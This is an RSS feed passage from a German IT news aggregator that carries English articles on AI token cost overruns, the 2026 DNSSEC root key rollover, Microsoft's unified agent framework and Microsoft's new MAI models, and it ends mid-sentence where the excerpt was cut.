<p class="wp-block-paragraph">Over 10,000 attendees will hear from 250-plus startup founders, technology executives, and enterprise IT leaders about how the future of programming is being rewritten, what enterprise AI security requires, how startups are orchestrating workloads across models while managing cost and reliability at scale, why creating a safety culture is essential for AI deployment, and how startups are deciding what work humans should own versus what should be delegated to AI as they work to build hybrid teams without losing speed, accountability, or culture.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p class="wp-block-paragraph">And of course, the rising tide of enterprise-focused startups will be there seeking to bring agentic systems to your business workflows, as well as vendors familiar to your enterprise IT portfolios, such as AWS, Google, and Databricks, and enterprise IT colleagues creating mutually beneficial partnerships with the startup community, such as American Express.</p>



<p class="wp-block-paragraph">That’s not to mention TechCrunch Disrupt’s signature <a href="https://techcrunch.com/startup-battlefield/">Startup Battlefield</a>, in which 200 standout companies showcase their innovations to compete for a $100K equity-free prize. The battlefield will give CIOs a rapid-fire, broad view of what’s possible — and a possible early look at the next big enterprise player. After all, Dropbox, Trello, and Cloudflare, among others, roamed that same battlefield before the world knew their names.</p>



<p class="wp-block-paragraph">And with M&amp;A now an early-stage startup strategy for many from day one, TechCrunch Disrupt’s exhibition floor provides IT leaders not just an opportunity to discuss the nuts and bolts of innovation architecture or how an upstart product can enhance your workflows, but a chance to find your next innovation partner, or more.</p>



<p class="wp-block-paragraph">Leading-edge startups are figuring out how to make AI work at scale. Shouldn’t you be?</p>



<p class="wp-block-paragraph"><strong>Don’t miss your chance to experience TechCrunch Disrupt 2026. <a href="https://techcrunch.com/events/techcrunch-disrupt/?utm_source=cio&amp;utm_medium=partner&amp;utm_campaign=disrupt2026&amp;utm_content=partnerdiscount&amp;promo=cio10&amp;display=true">Book your pass today and use the exclusive code CIO10</a> to save 10% before prices increase.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Getting a grip on shadow tokens and AI blowouts]]></title>
<description><![CDATA[Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and a clear case study in how limited oversight snowbal...]]></description>
<link>https://tsecurity.de/de/3691453/it-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691453/it-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</guid>
<pubDate>Fri, 24 Jul 2026 14:04:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and <a href="https://www.forbes.com/sites/janakirammsv/2026/05/17/uber-burns-its-2026-ai-budget-in-four-months-on-claude-code/">a clear case study</a> in how limited oversight snowballs into an AI blowout.</p>



<p class="wp-block-paragraph">This is a phenomenon I like to call “shadow tokens” — AI credits paid for by the company but largely invisible to decision-makers. Too many engineers have the final say over how much they consume and, therefore, what it costs. This all-you-can-eat attitude is part of the reason why <a href="https://www.theverge.com/tech/930447/microsoft-claude-code-discontinued-notepad">Microsoft is reportedly</a> winding down many internal licenses across key engineering teams and why <a href="https://www.thestreet.com/investing/the-next-phase-of-ai-spending-is-already-underway">one in five organizations</a> is missing its AI spend forecast by more than 50%.</p>



<p class="wp-block-paragraph">And the trend is only accelerating. By 2028, <a href="https://www.cio.com/article/4189149/ai-coding-token-costs-are-on-track-to-rival-human-payroll.html">Gartner predicts</a> that AI coding costs (driven by this kind of ungoverned consumption) will be as much per developer as the salary companies pay that person.</p>



<p class="wp-block-paragraph">LLMs and agents introduce a new class of variable cost that scales with behavior rather than headcount, putting enterprises on the hook for tools that balloon with workload. I don’t see this as enterprises overspending because they’re reckless — it’s down to a lack of managerial oversight, budget alignment that demands a proven return on investment, and engineer education on how much is too much.</p>



<p class="wp-block-paragraph">Going forward, CIOs need to thread the AI needle between governance that encourages transparency and reasonable spend without stifling innovation.</p>



<h2 class="wp-block-heading">When shadow tokens result in real costs</h2>



<p class="wp-block-paragraph">The issue is that AI isn’t a traditional line item. Previously, enterprise leaders onboarded software-as-a-service (SaaS) with a good idea of the total cost. An allocated software seat or annual contract was a known quantity. The cloud added some variation (with fluctuations depending on hosting size), but instances were still modelable. AI flips this status quo on its head — the unit of consumption is behavior and the cost is exponential.</p>



<p class="wp-block-paragraph">And these specifics aren’t immediately apparent at pilot. Tools can appear inexpensive in controlled experiments yet unpredictably scale depending on session length, context window size, model selection and whether agents run in parallel. This is the fallacy of the $20-per-seat enterprise plan — tokens are charged separately at API rates with no ceiling. The final dollar value of any session is set by factors that finance can’t always model in advance, particularly when these decisions usually rest with the engineers themselves.</p>



<p class="wp-block-paragraph">According to <a href="https://www.deloitte.com/cz-sk/en/services/consulting/research/the-state-of-ai-in-the-enterprise.html">Deloitte</a>, only 21% of organizations deploying agents have a mature governance model, a real concern because they’re token-eating machines. This is what was happening at Uber — Claude Code in agentic mode was autonomously reading codebases, planning changes across dozens of files and opening pull requests. Each step quickly adds up, with Anthropic’s own documentation noting that agents consume approximately seven times as many tokens as standard sessions.</p>



<p class="wp-block-paragraph">This is shadow IT and shadow AI, evolved. This time, however, many leaders approved the tool in question without guardrails governing consumption. AI hype adds fuel to the fire and normalizes long sessions. Uber’s CTO, for example, <a href="https://x.com/praveenTweets/status/2033627282418655711">described</a> a company-wide shift toward “agentic software engineering” with employees “who are quietly experimenting, quietly shipping and quietly pushing things forward”. This is an exciting way to test the limits of what’s possible, certainly, but it’s also a position that goes a long way to explaining how the company spent its annual AI budget by April.</p>



<h2 class="wp-block-heading">Shifting the culture from usage to yield</h2>



<p class="wp-block-paragraph">Engineers haven’t done anything wrong here. In fact, they’re adopting and experimenting as instructed, with Uber creating leaderboards and ranking users by token consumption. More use led to a better ranking, reflecting a culture that lauds new ways of doing things. This behavior is known as “<a href="https://www.cio.com/article/4178320/tokenmaxxing-when-ai-adoption-metrics-go-bad.html">tokenmaxxing</a>,” and its principal knock-on effect is shadow tokens — quantity-over-quality processes that leaders struggle to control until they’re fully realized in the budget. Of course, if management treats adoption metrics as performance metrics, then engineers can’t be blamed for using more tokens. The tension is that the teams driving adoption aren’t the ones managing spend.</p>



<p class="wp-block-paragraph">None of this is meant to dismiss AI’s productivity possibilities and potential return on investment. Developers save <a href="https://getdx.com/blog/ai-assisted-engineering-q4-impact-report-2025/">3.6 hours</a> per week, achieve 60% higher pull request throughput and cut onboarding time in half with automation. Meanwhile, Uber shared that roughly 11% of live backend updates were written by agents with no human in the loop. However, these wins aren’t the problem — it’s that too many teams aren’t connecting input to output. I’ve spoken to admins who discovered their token spend had tripled in a single quarter after using heavier models or accidentally doubling up on agentic applications. Nobody knew until the financial damage was done.</p>



<p class="wp-block-paragraph">Automation needs to happen sustainably with an eye on the bottom line. In my view, a much better metric for achieving this is AI yield — the measurable business or engineering output generated per dollar spent on tokens. Otherwise, without a feedback loop, even genuinely productive teams are flying blind.</p>



<h2 class="wp-block-heading">Stopping token waste before an AI blowout</h2>



<p class="wp-block-paragraph">Creating that throughline between AI investment and token consumption starts with established financial metrics. This is possible via maximum spend limits (dictated by spend tagging, workload tiering and cost-per-output benchmarks) per team or project. Then, any additional allocation requires approval, closing the loop between the engineers spending the tokens and the leaders paying for them. AI isn’t cheap and teams should demonstrate a bang for their buck.</p>



<p class="wp-block-paragraph">This is something we do with our engineering team at Hexnode. Resource allocation for Claude Code and Cursor is tied directly to ROI rather than letting consumption run open-ended. Given the pay-as-you-go nature of these tools, a firm usage limit per team offers simple but essential control.</p>



<p class="wp-block-paragraph">Similarly, there’s room to apply some of the governance principles IT uses for device management. Things like policy enforcement, role-based access, real-time monitoring and automated alerts can flag usage behavior in advance. Uncovering such insights at the token layer works to identify power users and prevent excessive spending.</p>



<p class="wp-block-paragraph">We also need to encourage cultures that praise outputs that actually achieve efficiency. AI applications that result in shipping faster, reducing rework and cutting review cycles are gains that should be celebrated. If your company hosts leaderboards, frame unnecessary token burn as wasteful rather than valuable. The organizations creating healthier consumption habits work with their engineers to understand not just how to use AI, but what responsible use looks like and what it costs.</p>



<p class="wp-block-paragraph">This is a conversation teams need to have now. Anthropic <a href="https://support.claude.com/en/articles/15036540-use-the-claude-agent-sdk-with-your-claude-plan">just ended flat-rate pricing</a> for programmatic workloads from June 15. Now, agents, continuous integration pipelines and automated workflows draw from a dedicated monthly credit pool billed separately from the subscription. Once that pool is exhausted, agent tasks either stop entirely or overflow to extra billing. Work can either get very expensive or grind to a halt for teams that aren’t prepared.</p>



<p class="wp-block-paragraph">Getting a grip on shadow tokens means better rules and tools connecting spend to outcomes. Only by building the financial and cultural infrastructure that encourages sustainable adoption can leaders see what they’re spending, connect it to what they’re getting and course-correct before the costs become a crisis. Ultimately, shadow tokens are only invisible if we choose not to look.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIOs beware: DNS KSK rollover could kick off wave of mysterious outages]]></title>
<description><![CDATA[Predicting an outage is tricky business, but CIOs might want to circle Oct. 11, 2026, through Jan. 11, 2027, for likely trouble of a potentially widespread and puzzling nature.



That’s because a relatively trivial update to DNSSEC on Oct. 11, one that will take full effect by Jan. 11, is likely...]]></description>
<link>https://tsecurity.de/de/3691225/it-security-nachrichten/cios-beware-dns-ksk-rollover-could-kick-off-wave-of-mysterious-outages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691225/it-security-nachrichten/cios-beware-dns-ksk-rollover-could-kick-off-wave-of-mysterious-outages/</guid>
<pubDate>Fri, 24 Jul 2026 12:09:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Predicting an outage is tricky business, but CIOs might want to circle Oct. 11, 2026, through Jan. 11, 2027, for likely trouble of a potentially widespread and puzzling nature.</p>



<p class="wp-block-paragraph">That’s because a relatively trivial update to DNSSEC on Oct. 11, one that will take full effect by Jan. 11, is likely to deliver a series of seemingly unrelated system outages. This will come from oceans of dependencies from third-party, shadow, agentic, gen AI, SaaS, homegrown, and legacy apps — among many other quiet executable hiding spots, including virtual environments and containers.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/joshithak/">Sai Joshitha Kathari</a>, senior site reliability engineer at payment card giant Visa, says most enterprises have far more DNS-related exposure than they realize because of these many dependencies.</p>



<p class="wp-block-paragraph">“This has the potential to create real downstream destruction when unresolved failures sit underneath important business functions,” Kathari says. </p>



<p class="wp-block-paragraph">The danger is that so many of these issues are either unknown to IT or handled by a third-party vendor and no one in IT has had reason to ask those vendors about DNS updates. </p>



<p class="wp-block-paragraph">“The risky areas are usually not the obvious managed DNS services. They are the older internal applications, hardcoded resolvers, containerized workloads, sidecar configurations, custom scripts, partner integrations, VM images, stale base images, and service-to-service dependencies that nobody has touched in a long time,” Kathari explains. “These systems can keep working quietly for years, then fail during a DNS or certificate-related change because they bypassed the normal platform standards.”</p>



<p class="wp-block-paragraph">Independent technology analyst <a href="https://www.linkedin.com/in/carmi/">Carmi Levy</a> says that CIOs need to take this event very seriously. </p>



<p class="wp-block-paragraph">“The two-pronged deadline — October 11, 2026, when the new Key Signing Key (KSK) begins signing the root zone, and January 11, 2027, when the old key is retired — should be marked in red on everyone’s calendar, just as December 31, 1999, once was,” Levy says. “Failure to comply could result in websites, critical business applications, and related resources dropping off the face of the Earth once the transition is complete.”</p>



<p class="wp-block-paragraph">Levy adds: “Custom-built code that lives outside conventional support mechanisms may or may not function when the DNS changes go into effect.”</p>



<p class="wp-block-paragraph">The <a href="https://www.icann.org/resources/press-material/release-2026-05-20-en">DNSSEC update itself</a> is straightforward, but it is also the first significant DNSSEC change — specifically a change in the trust anchor — since 2018. </p>



<p class="wp-block-paragraph">The rollout statement noted that “the trust anchor is formally known as the Domain Name System Security Extensions (DNSSEC) root zone Key Signing Key (KSK). The KSK is the cryptographic key at the core of the DNSSEC trust anchor and is used to verify that DNS responses are legitimate and have not been modified in transit.”</p>



<h2 class="wp-block-heading">Expect nearly every enterprise to be impacted</h2>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/kimdavies/">Kim Davies</a>, vice president of IANA Services and president of public technical identifiers at ICANN, says the extent of the impact on enterprises is unknowable, given the nature of shadow IT and other edge cases. </p>



<p class="wp-block-paragraph">But based on the massive number of dependencies both known and unknown in the typical global enterprise, Davies guesses that just about every enterprise will be impacted, to varying degrees. </p>



<p class="wp-block-paragraph">“In highly complex organizations, it is very likely there will be some impact in the corners, in the margins, of the organization,” Davies tells CIO. “DNS is such a core technology that underpins everything.”</p>



<p class="wp-block-paragraph">As the updates propagate, hiccups will materialize, Davies notes. “When the system cannot validate the [DNS] information, it will treat it as suspect and DNS lookups will fail.”</p>



<p class="wp-block-paragraph">Visa’s Kathari says, “Enterprises should expect some secondary DNS-related glitches when major DNSSEC-related changes happen, not necessarily because the core infrastructure teams will ignore the update, but because large environments have many hidden dependency paths.”</p>



<p class="wp-block-paragraph">Making this problem far worse, Kathari notes, is that the glitches will likely initially look like anything other thana DNS glitch. That will force IT staff to waste a vast number of hours chasing causes that ultimately prove to be unrelated to the incidents. </p>



<p class="wp-block-paragraph">“The impact for CIOs is that DNS failures rarely announce themselves as DNS failures. They look like application timeouts, broken logins, failed API calls, queue lag, payment failures, partner connectivity issues, or random regional instability,” Kathari explains. “That makes troubleshooting slower because teams may spend hours looking at the application, database, network, or cloud provider before realizing name resolution is part of the failure path.”</p>



<p class="wp-block-paragraph"><a href="https://greyhoundresearch.com/svg/">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, agrees that IT will likely spin its wheels chasing the wrong ghosts.</p>



<p class="wp-block-paragraph">“A validation failure rarely stays in its lane. It surfaces as an application error, an API timeout, or a reachability problem, which turns a resolver fault into a coordination failure,” Gogia says. “The application team blames the network, the network team blames the cloud, and the user simply watches work stop.”</p>



<p class="wp-block-paragraph">“Images and templates are the frontier most teams miss,” Gogia adds. “A resolver fixed in summer can be broken again in October the instant a stale golden image is redeployed, because automation no longer lets configuration drift slowly. It restores yesterday’s assumptions at machine speed.”</p>



<p class="wp-block-paragraph">It is widely expected that enterprises will not have any problems executing the change or, more likely, relying on their hyperscalers to properly handle the change. That is the concern. </p>



<p class="wp-block-paragraph">“CIOs are being distracted so much with AI and this is such a deep in the weeds infrastructure issue that this can and willcatch people off-guard,” <a href="https://acceligence.com/talent/profiles/justin-greis/">Justin Greis</a>, CEO of consulting firm Acceligence, tells CIO. “I think we’ll see a meaningful number of enterprise disruptions associated with the DNSSEC trust anchor rollover. Not because the update itself is especially difficult, but because it will expose weaknesses that already exist inside many organizations.”</p>



<p class="wp-block-paragraph">Most enterprise IT operations have had no reason to compile a comprehensive list of all DNS dependencies, but many will be instantly discovered in January. </p>



<h2 class="wp-block-heading">Potentially widespread fallout</h2>



<p class="wp-block-paragraph">A major retailer, for example, might suddenly be unable to connect with FedEx to arrange for deliveries or a hospital may find that test results are no longer being shared with patient portals. It might manifest as an assembly line that halts because an IIoT component can no longer share files with its vendor system or a truck fleet that stops being tracked. </p>



<p class="wp-block-paragraph">“There will almost certainly be systems that fall through the cracks. Some will be legacy applications that rely on outdated DNS configurations that have not been updated in years,” Greis says. “Others will be business-unit-developed tools, contractor-built solutions, embedded systems, manufacturing and industrial systems, or highly customized workloads that operate outside normal IT oversight. These are the types of systems that often surface during infrastructure events like this.”</p>



<p class="wp-block-paragraph">Greis adds that many enterprises will discover in January problems created by their own automation.</p>



<p class="wp-block-paragraph">“Over time, enterprises build layers of processes, templates, and deployment mechanisms that are reused across teams and environments,” Greis notes. “Even after DNS infrastructure is updated correctly, older settings can inadvertently be reintroduced through routine updates and system changes, creating intermittent and difficult-to-diagnose failures.”</p>



<p class="wp-block-paragraph">The good news from this situation is that enterprises are not going to likely lose all DNS access if any of these glitches occur. But that may be of no comfort because even if the disruptions are only with small edge cases, that can still cause massive operational disruptions.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/cricketliu/">Cricket Liu</a>, EVP and chief evangelist at Infoblox, gives the example of a DNS server that responds to factory-floor system queries.</p>



<p class="wp-block-paragraph">“Or let’s say this disrupts [an enterprise’s key] SaaS application. All name resolution may stop and it will show a server failure. It will not deliver a response whenever I look anything up. That’s not subtle at all,” Liu says. “It’s highly likely that companies are going to see some effects.”</p>



<p class="wp-block-paragraph">Back in 2017, the switchover was relatively uneventful, giving some CIOs hope that January 2027 will also be a non-event. But given the technology advancements in the last 10 years and the resulting tidal wave of new enterprise tech dependencies, few are realistically expecting no problems this go around. </p>



<h2 class="wp-block-heading">Impossible to predict what will happen</h2>



<p class="wp-block-paragraph">One of the top network experts on DNS effects in enterprises is <a href="https://blog.apnic.net/author/geoff-huston/">Geoff Huston</a>, chief scientist at the Asia Pacific Network Information Centre (APNIC), the regional Internet Registry administering IP addresses for the Asia Pacific region.</p>



<p class="wp-block-paragraph">Huston says it is difficult to project what will happen in January until it happens.</p>



<p class="wp-block-paragraph">“Just like the last time, we are flying blind with this key roll. Because nothing really terrible happened last time, there is some confidence that nothing terrible will happen this time, but we just can’t tell in advance as there are no good measurement approaches that allow us to peek inside the trust state of recursive resolvers,” he says.</p>



<p class="wp-block-paragraph">As for potential edge-case glitches, Huston says it is possible, but if third-party vendors do not properly handle the update, there will be other issues as well, as the KSK cryptographic key used within DNSSEC signs and validates the keys that protect DNS records. </p>



<p class="wp-block-paragraph">“If it is not standards-compliant, then you have more problems than just the KSK roll,” Huston says, “as it raises the obvious question of ‘What else is not correctly implemented in the DNS resolver that I’m running?’”</p>



<p class="wp-block-paragraph">As a silver lining, Acceligence’s Greis says any hiccups that result from the DNS KSK update may be a gift in disguise for CIOs. </p>



<p class="wp-block-paragraph">“The irony is that some of the most business-critical components in the technology stack are often the least visible because they work in the background,” Greis says. January “may reveal how much modern business resilience depends on infrastructure that many organizations rarely examine until something breaks. For CIOs, that’s the real lesson. This is not fundamentally a story about a DNS update. It is a story about operational visibility, resilience, and governance. Organizations that treat the rollover as a routine infrastructure task will likely complete the update and move on. Organizations that use it as an opportunity to understand and strengthen the foundations of their technology environment may gain far more value than simply avoiding an outage.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Microsoft agent framework wars are over. The real architecture decision starts now]]></title>
<description><![CDATA[Over the past year, I had the same conversation with almost every team starting an AI initiative. Should we build on Semantic Kernel, AutoGen or Foundry?



At first it felt like the most important architectural decision we’d make. Each framework had its own philosophy, each promised to be the fo...]]></description>
<link>https://tsecurity.de/de/3691079/ai-nachrichten/the-microsoft-agent-framework-wars-are-over-the-real-architecture-decision-starts-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691079/ai-nachrichten/the-microsoft-agent-framework-wars-are-over-the-real-architecture-decision-starts-now/</guid>
<pubDate>Fri, 24 Jul 2026 11:04:58 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Over the past year, I had the same conversation with almost every team starting an AI initiative. Should we build on Semantic Kernel, AutoGen or Foundry?</p>



<p class="wp-block-paragraph">At first it felt like the most important architectural decision we’d make. Each framework had its own philosophy, each promised to be the foundation for enterprise AI, and picking the wrong one felt like an expensive mistake. I spent a lot of time helping teams weigh the trade-offs.</p>



<p class="wp-block-paragraph">Looking back, I think we were asking the wrong question. I certainly was.</p>



<p class="wp-block-paragraph">I watched teams spend months debating SDKs while the decisions that actually decided whether their applications survived production went unexamined. Some built elaborate orchestration layers for workflows that a few deterministic functions would have handled. Others avoided agent frameworks entirely and later found they’d designed themselves into a corner.</p>



<p class="wp-block-paragraph">Then Microsoft settled it for us. It <a href="https://learn.microsoft.com/en-us/agent-framework/overview/">introduced the unified Agent Framework</a>, quietly moved Semantic Kernel and AutoGen into <a href="https://devblogs.microsoft.com/agent-framework/migrate-your-semantic-kernel-and-autogen-projects-to-microsoft-agent-framework-release-candidate/">maintenance mode</a>, and the debate I’d spent months refereeing was suddenly over. Turns out the answer to “which of the three” was “none of the three, here’s a fourth.” The framework hit version 1.0 and general availability in April 2026, stable across .NET and Python.</p>



<p class="wp-block-paragraph">What surprised me wasn’t the decision. It was how fast a debate that had eaten so much of our attention stopped mattering. Microsoft changed the menu.</p>



<p class="wp-block-paragraph">It didn’t change the meal.</p>



<h2 class="wp-block-heading">The framework was never the hard part</h2>



<p class="wp-block-paragraph">Framework selection dominated almost every early conversation I had about enterprise agents. Which SDK do we standardize on? Which orchestration model gives us the most flexibility? Which one is Microsoft actually betting on?</p>



<p class="wp-block-paragraph">Fair questions. But after a year of watching these projects play out, I’ve slowly come around to a different view. Those weren’t the questions that decided anything.</p>



<p class="wp-block-paragraph">The first question I ask now is much smaller. Does this thing actually need an agent?</p>



<p class="wp-block-paragraph">It sounds obvious, and I still get it wrong sometimes. But it’s the mistake I see most. On one project, a team spent weeks designing a multi-agent workflow for a process that ran the same four steps every time: read a document, validate it, call an API, send a notification. The diagrams looked great. The system in production didn’t. A few well-tested functions would have been easier to build, easier to maintain and a lot easier to trust.</p>



<p class="wp-block-paragraph">Part of this is just that “<strong>agent</strong>” has become the word everyone reaches for. Sometimes it’s the right call. Sometimes it’s a workflow we already knew how to build, wearing a newer label. An agent earns its complexity when it genuinely has to decide things you can’t predetermine, choosing between tools, adapting to what it finds, working out its own next step. If you already know every step, you have a workflow, and a workflow is usually the better engineering choice. The consolidation didn’t change that. It just made it easier to see.</p>



<h2 class="wp-block-heading">What building production agents actually taught me</h2>



<p class="wp-block-paragraph">Once I stopped fixating on frameworks, the same three problems kept showing up. None of them had anything to do with the SDK.</p>



<h3 class="wp-block-heading">Context beats model choice</h3>



<p class="wp-block-paragraph">Early on I spent a lot of time comparing models, the way you’d agonize over a restaurant menu and then order what you always order. Now I spend most of it thinking about context, which is far less fun and far more useful.</p>



<p class="wp-block-paragraph">I’ve watched good models fail because they were handed too much, not too little. One team I worked with gave the model access to nearly every internal document they had on the theory that more information meant better answers. It went the other way. Responses got slower, less consistent and sometimes skipped right past the thing that actually mattered. When we cut the context down to only what the task needed, the quality jumped almost immediately. I didn’t predict that. It taught me to be suspicious of “just give it everything.”</p>



<p class="wp-block-paragraph">The best agent systems I’ve worked on weren’t the ones with the biggest context windows. They were the ones careful about what reached the model, and when. That’s not something the framework hands you.</p>



<h3 class="wp-block-heading">Failure is where the real work is</h3>



<p class="wp-block-paragraph">Most agent demos look great because they’re built around the happy path. Production doesn’t extend that courtesy.</p>



<p class="wp-block-paragraph">I remember a project where everything held up in testing. Then a downstream API timed out after the agent had already completed several earlier steps. We couldn’t just restart, because part of the business process had already gone through. We ended up spending far more time on recovery logic than we ever spent on prompts. That project changed how I think about this work. The hard part was never getting the model to make a decision. It was making sure the system didn’t fall apart when reality refused to follow the script.</p>



<p class="wp-block-paragraph">Tool calls fail partway through. APIs return inconsistent data. Models call the same tool over and over because the last answer wasn’t what they wanted. That’s not the exception; that’s a normal Tuesday. Whether you retry, roll back, pause for a human or push on with partial results is a judgment call, and no framework is going to make it for you.</p>



<h3 class="wp-block-heading">Identity is the real security boundary</h3>



<p class="wp-block-paragraph">This one surprised me most. The moment an agent stops being a chatbot and starts touching real business systems, identity matters more than orchestration.</p>



<p class="wp-block-paragraph">Every project gets to the same question eventually. Who is this agent actually acting as? The developer’s credentials? A service account? The user who asked? Get it wrong and you’ve built something autonomous running with more access than any single person should have, which is exactly the kind of thing that looks fine until an audit. The Agent Framework, like most modern tooling, makes it easier to wire agents to tools through standards like the <a href="https://modelcontextprotocol.io/">Model Context Protocol</a>. That helps. But where human approval belongs, what needs extra authorization, how much rope to give the thing, those are still yours to decide.</p>



<h3 class="wp-block-heading">The surprises weren’t technical</h3>



<p class="wp-block-paragraph">Here’s what I didn’t see coming. The hardest part of last year wasn’t technical at all. It was organizational. The moment a team heard “agent,” expectations shifted under everyone’s feet. Business stakeholders started expecting full autonomy. Developers assumed the thing could reason its way through anything. People started designing for flexibility before we’d even agreed on what problem we were solving. The word did damage before any code did. I found myself spending as much time resetting expectations as I did discussing architecture.</p>



<h2 class="wp-block-heading">Build for change, not for today’s winner</h2>



<p class="wp-block-paragraph">I don’t think the teams that struggled last year picked the wrong framework. Semantic Kernel was reasonable. AutoGen was reasonable. Foundry made sense for plenty of cases. I’d have signed off on any of them.</p>



<p class="wp-block-paragraph">The ones that got hurt put all their eggs in one framework, treating it as the foundation of the whole system instead of as one more dependency. Microsoft provided a migration path. But teams that had tightly coupled their applications to framework-specific abstractions discovered that migrating and rewriting are not the same thing. That wasn’t Microsoft’s doing. It was their own architecture’s. The teams that moved easily had kept their business logic, prompts and orchestration loose enough to evolve independently of any one SDK. For them, the change was a manageable project, not a teardown.</p>



<p class="wp-block-paragraph">For what it’s worth, nobody I work with is treating this as an emergency. Most are moving the smaller workloads first, watching how they behave and leaving the production-critical systems alone until they actually understand the new abstractions. That’s the right instinct. And I doubt this is the last consolidation we’ll see, the ecosystem is still young, frameworks will keep absorbing each other and over time the differences between them will be operational more than architectural.</p>



<p class="wp-block-paragraph">I don’t regret the framework debates, honestly. They were reasonable at the time. What changed wasn’t Microsoft’s roadmap.</p>



<p class="wp-block-paragraph">It was mine. Watching these systems run in production taught me that the framework is the easiest piece to swap out. Recovery logic, context management, security boundaries, the business workflow itself, those stay with you long after today’s SDK gets replaced by tomorrow’s.</p>



<p class="wp-block-paragraph">So, Microsoft made one decision easier by turning three frameworks into one. Good. Five years from now we’ll be on different tools, and we’ll still be asking the same handful of questions.</p>



<p class="wp-block-paragraph">Does this actually need an agent? Does it have the right context? Can it recover when something breaks, because something will? Is it acting as the right person?</p>



<p class="wp-block-paragraph">Those questions outlast every rewrite. That’s where I’ve learned to put my effort.</p>



<p class="wp-block-paragraph">Frameworks come and go. Good architecture has to survive all of them.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.infoworld.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft launches new in-house AI models it says cut costs up to 89% versus OpenAI]]></title>
<description><![CDATA[Microsoft AI released two new in-house models into public preview on Wednesday — MAI-Image-2.5-Pro, its highest-fidelity image generator to date, and MAI-Voice-2-Flash, a speech model built for high-volume enterprise workloads — while publishing production data that amounts to the company's most ...]]></description>
<link>https://tsecurity.de/de/3690504/it-nachrichten/microsoft-launches-new-in-house-ai-models-it-says-cut-costs-up-to-89-versus-openai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690504/it-nachrichten/microsoft-launches-new-in-house-ai-models-it-says-cut-costs-up-to-89-versus-openai/</guid>
<pubDate>Fri, 24 Jul 2026 02:50:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://microsoft.ai/">Microsoft AI</a> released two new in-house models into public preview on Wednesday — <a href="https://microsoft.ai/news/introducing-mai-image-2-5-pro-and-mai-voice-2-flash/">MAI-Image-2.5-Pro</a>, its highest-fidelity image generator to date, and <a href="https://microsoft.ai/news/introducing-mai-image-2-5-pro-and-mai-voice-2-flash/">MAI-Voice-2-Flash</a>, a speech model built for high-volume enterprise workloads — while publishing production data that amounts to the company's most aggressive argument yet that it can power its own products without leaning on OpenAI's frontier models.</p><p>The announcement, made by <a href="https://microsoft.ai/">Microsoft AI's Superintelligence team</a>, lands roughly a year after the company committed to building purpose-built models internally, and it arrives with an unusual level of specificity about where those models now run: <a href="https://www.bing.com/">Bing</a>, <a href="https://www.microsoft.com/en-us/microsoft-365/powerpoint">PowerPoint</a>, <a href="https://www.microsoft.com/en-us/microsoft-365/onedrive/online-cloud-storage">OneDrive</a>, <a href="https://www.microsoft.com/en-us/dynamics-365">Dynamics 365</a>, <a href="https://excel.cloud.microsoft/en-us/">Excel</a>, <a href="https://github.com/features/copilot">GitHub Copilot</a>, and <a href="https://azure.microsoft.com/en-us">Azure</a>. The message to enterprise buyers — and, implicitly, to OpenAI — is that Microsoft's homegrown models are no longer research projects. They are production infrastructure serving millions of users.</p><p>"Each of these enhancements is a step toward the same goal: Microsoft products, powered by Microsoft models," the company wrote in its announcement blog.</p><h2><b>How MAI-Image-2.5-Pro and MAI-Voice-2-Flash stake out opposite ends of the AI cost curve</b></h2><p>The two new releases occupy opposite ends of what Microsoft calls the quality-speed-cost curve, and the positioning is deliberate. <a href="https://microsoft.ai/news/introducing-mai-image-2-5-pro-and-mai-voice-2-flash/">MAI-Image-2.5-Pro</a> targets the premium tier: hero imagery, detailed editing, and precise in-image text rendering — the last of which has long been a notorious weak spot for image generation models. Microsoft priced the model at $5 